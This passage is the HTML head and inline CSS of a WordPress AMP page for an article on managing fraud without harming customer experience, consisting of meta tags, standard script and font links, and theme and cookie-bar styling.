#dfdfdf}:where(amp-accordion>section)>:last-child{margin:0}}amp-accordion>section{float:none!important}amp-accordion>section>*{float:none!important;display:block!important;overflow:hidden!important;position:relative!important}amp-accordion,amp-accordion>section{margin:0}amp-accordion:not(.i-amphtml-built)>section>:last-child{display:none!important}amp-accordion:not(.i-amphtml-built)>section[expanded]>:last-child{display:block!important} /*# sourceURL=/css/ampshared.css*/</style><meta name="amp-to-amp-navigation" content="AMP-Redirect-To; AMP.navigateTo"><meta name="robots" content="max-image-preview:large"><meta name="generator" content="WordPress 6.1.1"><meta property="og:image" content="https://images.unsplash.com/photo-1617207281953-01b41c126aab?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=MnwxfDB8MXxyYW5kb218MHx8ZnJhdWQsOTMzOS4xNTA0MTI3NjI5OXx8fHx8fDE2NjIwMDE5MjQ&ixlib=rb-1.2.1&q=80&utm_campaign=api-credit&utm_medium=referral&utm_source=unsplash_source&w=1080"><meta property="og:title" content="4 Ways to Manage Fraud Without Damaging the Customer Experience"><meta property="og:description" content=""><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="4 Ways to Manage Fraud Without Damaging the Customer Experience"><meta name="twitter:description" content=""><meta name="twitter:image" content="https://images.unsplash.com/photo-1617207281953-01b41c126aab?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=MnwxfDB8MXxyYW5kb218MHx8ZnJhdWQsOTMzOS4xNTA0MTI3NjI5OXx8fHx8fDE2NjIwMDE5MjQ&ixlib=rb-1.2.1&q=80&utm_campaign=api-credit&utm_medium=referral&utm_source=unsplash_source&w=1080"><meta name="generator" content="AMP Plugin v2.4.1; mode=transitional"><meta name="msapplication-TileImage" content="https://quantuminsan.com/wp-content/uploads/2022/01/wwwd.png"><link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="preload" href="https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0" as="font" crossorigin=""><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""><link rel="dns-prefetch" href="https://fonts.gstatic.com"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-form-0.1.mjs" async="" custom-element="amp-form" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0/amp-form-0.1.js" crossorigin="anonymous" custom-element="amp-form"></script><link rel="icon" href="https://quantuminsan.com/wp-content/uploads/2022/01/wwwd-150x150.png" sizes="32x32"><link rel="icon" href="https://quantuminsan.com/wp-content/uploads/2022/01/wwwd.png" sizes="192x192"><link crossorigin="anonymous" rel="stylesheet" id="default-mag-google-fonts-css" href="https://fonts.googleapis.com/css?family=EB%20Garamond:700,700i,800,800i%7CMerriweather:100,300,400,400i,500,700%7CSource%20Sans%20Pro:100,300,400,400i,500,700" type="text/css" media="all"><style amp-custom="">.twp-logo a,.twp-logo p{color:#000}amp-img.amp-wp-enforced-sizes{object-fit:contain}amp-img img,amp-img noscript{image-rendering:inherit;object-fit:inherit;object-position:inherit}:where(.wp-block-button__link){box-shadow:none;text-decoration:none;border-radius:9999px;padding:calc(.667em + 2px) calc(1.333em + 2px)}.wp-block-categories{box-sizing:border-box}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:none}:where(.wp-block-file__button){border-radius:2em;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}.wp-block-group{box-sizing:border-box}.wp-block-latest-comments .wp-block-latest-comments{padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both}ul{box-sizing:border-box}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}.wp-block-search__button{margin-left:.625em;word-break:normal}.wp-block-search__button svg{min-width:1.5em;min-height:1.5em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:.375em .625em}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{padding:8px;flex-grow:1;margin-left:0;margin-right:0;min-width:3em;border:1px solid #949494}.wp-block-search__input:not(#_#_#_#_#_#_#_){text-decoration:unset}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-radius:0;border:none;padding:0 0 0 .25em}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:.125em .5em}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){word-wrap:normal}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}html :where(.has-border-color){border-style:solid}html :where([data-amp-original-style*=border-top-color]){border-top-style:solid}html :where([data-amp-original-style*=border-right-color]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-color]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-color]){border-left-style:solid}html :where([data-amp-original-style*=border-width]){border-style:solid}html :where([data-amp-original-style*=border-top-width]){border-top-style:solid}html :where([data-amp-original-style*=border-right-width]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-width]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-width]){border-left-style:solid}html :where(amp-img[class*=wp-image-]),html :where(amp-anim[class*=wp-image-]){height:auto;max-width:100%}body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--duotone--dark-grayscale:url("#wp-duotone-dark-grayscale");--wp--preset--duotone--grayscale:url("#wp-duotone-grayscale");--wp--preset--duotone--purple-yellow:url("#wp-duotone-purple-yellow");--wp--preset--duotone--blue-red:url("#wp-duotone-blue-red");--wp--preset--duotone--midnight:url("#wp-duotone-midnight");--wp--preset--duotone--magenta-yellow:url("#wp-duotone-magenta-yellow");--wp--preset--duotone--purple-green:url("#wp-duotone-purple-green");--wp--preset--duotone--blue-orange:url("#wp-duotone-blue-orange");--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}:where(.is-layout-flex){gap:.5em}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-flex){gap:2em}@keyframes spin{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}@keyframes blink{from{opacity:0}50%{opacity:1}to{opacity:0}}#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0px;font-weight:300;box-shadow:0 -1px 10px 0 rgba(172,171,171,.3)}#cookie-law-info-again{font-size:10pt;margin:0;padding:5px 10px;text-align:center;z-index:9999;cursor:pointer;box-shadow:#161616 2px 2px 5px 2px}#cookie-law-info-bar span{vertical-align:middle}.cli-plugin-button,.cli-plugin-button:visited{display:inline-block;padding:9px 12px;color:#fff;text-decoration:none;text-decoration:none;position:relative;cursor:pointer;margin-left:5px}.cli-plugin-button:hover{background-color:#111;color:#fff;text-decoration:none}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{font-size:13px;font-weight:400;line-height:1}.cli-plugin-button{margin-top:5px}.cli-bar-popup{-moz-background-clip:padding;-webkit-background-clip:padding;background-clip:padding-box;-webkit-border-radius:30px;-moz-border-radius:30px;border-radius:30px;padding:20px}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;display:none}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:900px}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.3rem;outline:0}.cli-modal .row{margin:0 -15px}.cli-modal .cli-modal-close{position:absolute;right:10px;top:10px;z-index:1;padding:0;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.cli-modal .cli-modal-close:not(#_#_#_#_#_#_#_){background-color:transparent}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:70px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:24px;width:50px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:20px;left:2px;position:absolute;transition:.4s;width:20px}.cli-switch input:checked + .cli-slider{background-color:#00acad}.cli-switch input:checked + .cli-slider:before{transform:translateX(26px)}.cli-switch .cli-slider{border-radius:34px}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-fade{transition:opacity .15s linear}.cli-tab-content{width:100%;padding:30px}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;-webkit-transform:scale(0);transform:scale(0);transition:opacity ease-in-out .5s}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:99999;transform:scale(0);overflow:hidden;outline:0;display:none}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:inherit;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.2rem;box-sizing:border-box;outline:0}.cli-modal .row{margin:0 -15px}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:38px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:20px;width:38px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:15px;left:3px;position:absolute;transition:.4s;width:15px}.cli-switch input:checked + .cli-slider{background-color:#61a229}.cli-switch input:checked + .cli-slider:before{transform:translateX(18px)}.cli-switch .cli-slider{border-radius:34px;font-size:0}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-tab-content{width:100%;padding:5px 30px 5px 5px;box-sizing:border-box}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}#cookie-law-info-bar .cli-tab-content{background:transparent}#cookie-law-info-bar .cli-nav-link,#cookie-law-info-bar .cli-tab-container p,#cookie-law-info-bar span.cli-necessary-caption,#cookie-law-info-bar .cli-switch .cli-slider:after{color:inherit}#cookie-law-info-bar .cli-tab-header a:before{border-right:1px solid currentColor;border-bottom:1px solid currentColor}#cookie-law-info-bar .cli-row{margin-top:20px}#cookie-law-info-bar .cli-tab-content h4{margin-bottom:.5rem}#cookie-law-info-bar .cli-tab-container{display:none;text-align:left}.cli-tab-footer .cli-btn{background-color:#00acad;padding:10px 15px;text-decoration:none}.cli-tab-footer .wt-cli-privacy-accept-btn{background-color:#61a229;color:#fff;border-radius:0}.cli-tab-footer{width:100%;text-align:right;padding:20px 0}.cli-col-12{width:100%}.cli-tab-header{display:flex;justify-content:space-between}.cli-tab-header a:before{width:10px;height:2px;left:0;top:calc(50% - 1px)}.cli-tab-header a:after{width:2px;height:10px;left:4px;top:calc(50% - 5px);-webkit-transform:none;transform:none}.cli-tab-header a:before{width:7px;height:7px;border-right:1px solid #4a6e78;border-bottom:1px solid #4a6e78;content:" ";transform:rotate(-45deg);-webkit-transition:all .2s ease-in-out;-moz-transition:all .2s ease-in-out;transition:all .2s ease-in-out;margin-right:10px}.cli-tab-header a.cli-nav-link{position:relative;display:flex;align-items:center;font-size:14px;color:#000;text-transform:capitalize}.cli-tab-header{border-radius:5px;padding:12px 15px;cursor:pointer;transition:background-color .2s ease-out .3s,color .2s ease-out 0s;background-color:#f2f2f2}.cli-modal .cli-modal-close{position:absolute;right:0;top:0;z-index:1;-webkit-appearance:none;width:40px;height:40px;padding:0;padding:10px;border-radius:50%;background:transparent;border:none;min-width:40px}.cli-tab-container h4,.cli-tab-container h1{font-family:inherit;font-size:16px;margin-bottom:15px;margin:10px 0}#cliSettingsPopup .cli-tab-section-container{padding-top:12px}.cli-tab-container p,.cli-privacy-content-text{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}.cli-tab-content{display:none}.cli-tab-section .cli-tab-content{padding:10px 20px 5px 20px}.cli-tab-section{margin-top:5px}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:645px}}.cli-switch .cli-slider:after{content:attr(data-cli-disable);position:absolute;right:50px;color:#000;font-size:12px;text-align:right;min-width:80px}.cli-switch input:checked + .cli-slider:after{content:attr(data-cli-enable)}.cli-privacy-overview:not(.cli-collapsed) .cli-privacy-content{max-height:60px;transition:max-height .15s ease-out;overflow:hidden}a.cli-privacy-readmore{font-size:12px;margin-top:12px;display:inline-block;padding-bottom:0;cursor:pointer;color:#000;text-decoration:underline}.cli-modal-footer{position:relative}a.cli-privacy-readmore:before{content:attr(data-readmore-text)}.cli-privacy-content p{margin-bottom:0}.cli-modal-close svg{fill:#000}span.cli-necessary-caption{color:#000;font-size:12px}#cookie-law-info-bar .cli-privacy-overview{display:none}.cli-tab-container .cli-row{max-height:500px;overflow-y:auto}@keyframes blowUpContent{0%{transform:scale(1);opacity:1}99.9%{transform:scale(2);opacity:0}100%{transform:scale(0)}}@keyframes blowUpContentTwo{0%{transform:scale(2);opacity:0}100%{transform:scale(1);opacity:1}}@keyframes blowUpModal{0%{transform:scale(0)}100%{transform:scale(1)}}@keyframes blowUpModalTwo{0%{transform:scale(1);opacity:1}50%{transform:scale(.5);opacity:0}100%{transform:scale(0);opacity:0}}.cli-tab-section .cookielawinfo-row-cat-table td,.cli-tab-section .cookielawinfo-row-cat-table th{font-size:12px}.cli_settings_button{cursor:pointer}.wt-cli-sr-only{display:none;font-size:16px}.cli-bar-container{float:none;margin:0 auto;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center}.cli-bar-btn_container{margin-left:20px;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center;flex-wrap:nowrap}.cli-style-v2 a{cursor:pointer}.cli-bar-btn_container a{white-space:nowrap}.cli-style-v2{font-size:11pt;line-height:18px;font-weight:normal}.cli-style-v2 .cli-bar-message{width:70%;text-align:left}.cli-style-v2 .cli-bar-btn_container .cli_action_button,.cli-style-v2 .cli-bar-btn_container .cli_settings_button{margin-left:5px}.cli-style-v2 .cli_settings_button:not(.cli-plugin-button),.cli-style-v2 .cli_action_button:not(.cli-plugin-button){text-decoration:underline}.cli-style-v2 .cli-bar-btn_container .cli-plugin-button{margin-top:5px;margin-bottom:5px}.wt-cli-necessary-checkbox:not(#_#_#_#_#_#_#_){display:none}@media (max-width: 985px){.cli-style-v2 .cli-bar-message{width:100%}.cli-style-v2.cli-bar-container{justify-content:left;flex-wrap:wrap}.cli-style-v2 .cli-bar-btn_container{margin-left:0px;margin-top:10px}}.wt-cli-privacy-overview-actions{padding-bottom:0}@media only screen and (max-width: 479px) and (min-width: 320px){.cli-style-v2 .cli-bar-btn_container{flex-wrap:wrap}}.wt-cli-cookie-description{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}html{box-sizing:border-box;-ms-overflow-style:scrollbar}*,::after,::before{box-sizing:inherit}.container{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:576px){.container{max-width:540px}}@media (min-width:768px){.container{max-width:720px}}@media (min-width:992px){.container{max-width:960px}}@media (min-width:1200px){.container{max-width:1140px}}.row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.col-lg-4,.col-lg-6,.col-sm-6{position:relative;width:100%;padding-right:15px;padding-left:15px}@media (min-width:576px){.col-sm-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}}@media (min-width:992px){.col-lg-4{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.col-lg-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}}@font-face{font-family:"FontAwesome";src:url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot?v=4.7.0");src:url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0") format("embedded-opentype"),url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0") format("woff2"),url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff?v=4.7.0") format("woff"),url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.ttf?v=4.7.0") format("truetype"),url("https://quantuminsan.com/wp-content/themes/default-mag/assets/libraries/font-awesome/fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular") format("svg");font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-search:before{content:""}.fa-clock-o:before{content:""}.fa-chevron-right:before{content:""}.fa-calendar:before{content:""}.fa-chevron-up:before{content:""}.fa-bolt:before{content:""}.sidr-class-sidr-button-close{display:block;margin-bottom:15px}button::-moz-focus-inner{padding:0;border:0}html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}h1{font-size:2em;margin:.67em 0}a{background-color:transparent}strong{font-weight:bolder}amp-img{border-style:none}button,input{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button{text-transform:none}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}[hidden]{display:none}body,button,input{color:#404040;font-family:sans-serif;font-size:16px;font-size:1rem;line-height:1.5}h1,h2,h3,h4{clear:both}p{margin-bottom:1.5em}em,i{font-style:italic}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}body{background:#fff}ul{margin:0 0 1.5em 3em}ul{list-style:disc}li > ul{margin-bottom:0;margin-left:1.5em}amp-img{height:auto;max-width:100%}table{margin:0 0 1.5em;width:100%}button,input[type=button],input[type=reset],input[type=submit]{border:1px solid;border-color:#ccc #ccc #bbb;border-radius:3px;background:#e6e6e6;color:rgba(0,0,0,.8);font-size:12px;font-size:.75rem;line-height:1;padding:.6em 1em .4em}button:hover,input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover{border-color:#ccc #bbb #aaa}button:active,button:focus,input[type=button]:active,input[type=button]:focus,input[type=reset]:active,input[type=reset]:focus,input[type=submit]:active,input[type=submit]:focus{border-color:#aaa #bbb #bbb}input[type=text],input[type=email],input[type=url],input[type=password],input[type=search],input[type=number],input[type=tel],input[type=range],input[type=date],input[type=month],input[type=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color]{color:#666;border:1px solid #ccc;border-radius:3px;padding:3px}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,input[type=search]:focus,input[type=number]:focus,input[type=tel]:focus,input[type=range]:focus,input[type=date]:focus,input[type=month]:focus,input[type=week]:focus,input[type=time]:focus,input[type=datetime]:focus,input[type=datetime-local]:focus,input[type=color]:focus{color:#111}a{color:royalblue}a:hover,a:focus,a:active{color:midnightblue}a:focus{outline:thin dotted}a:hover,a:active{outline:0}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){position:absolute;word-wrap:normal}.screen-reader-text:focus{background-color:#f1f1f1;border-radius:3px;box-shadow:0 0 2px 2px rgba(0,0,0,.6);clip-path:none;color:#21759b;display:block;font-size:14px;font-size:.875rem;font-weight:bold;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}#content[tabindex="-1"]:focus{outline:0}.entry-content:before,.entry-content:after,.site-header:before,.site-header:after,.site-content:before,.site-content:after,.site-footer:before,.site-footer:after{content:"";display:table;table-layout:fixed}.entry-content:after,.site-header:after,.site-content:after,.site-footer:after{clear:both}.widget{margin:0 0 1.5em}.post{margin:0 0 1.5em}.entry-content{margin:1.5em 0 0}.custom-logo-link{display:inline-block}.twp-single-related-post-list,.twp-mobile-menu ul,.twp-breadcrumbs ul,.widget ul,.desktop .twp-main-menu ul,.twp-tags-items,.twp-categories ul{list-style:none;margin:0;padding:0}.twp-breadcrumbs ul:before,.widget .search-form:before,.twp-ticket-pin:before,.twp-categories ul:before,.twp-breadcrumbs ul:after,.widget .search-form:after,.twp-ticket-pin:after,.twp-categories ul:after{clear:both;content:"";display:block}.twp-single-next-post{transform:perspective(1px) translateZ(0)}.twp-single-next-post .twp-image-section{text-align:center}p a,.twp-footer li a:hover,.twp-footer a:hover,.widget ul li a:hover{color:#f88c00}p a:hover{color:#c20017}.desktop .twp-main-menu > ul > li:hover > a{border-color:#f88c00}.widget .widget-title:after,.twp-title:after,.twp-search-field-wrapper .twp-search-field form input[type=submit],.twp-plus-icon span,.twp-close-icon span{background-color:#c20017;color:white}#scroll-top span,.twp-navigation .theme-mode a:hover,.twp-navigation .twp-search-section:hover,.widget .search-form .search-submit{background-color:#f88c00;color:white}@-webkit-keyframes spin{100%{transform:rotate(360deg)}}@-moz-keyframes spin{100%{transform:rotate(360deg)}}@keyframes 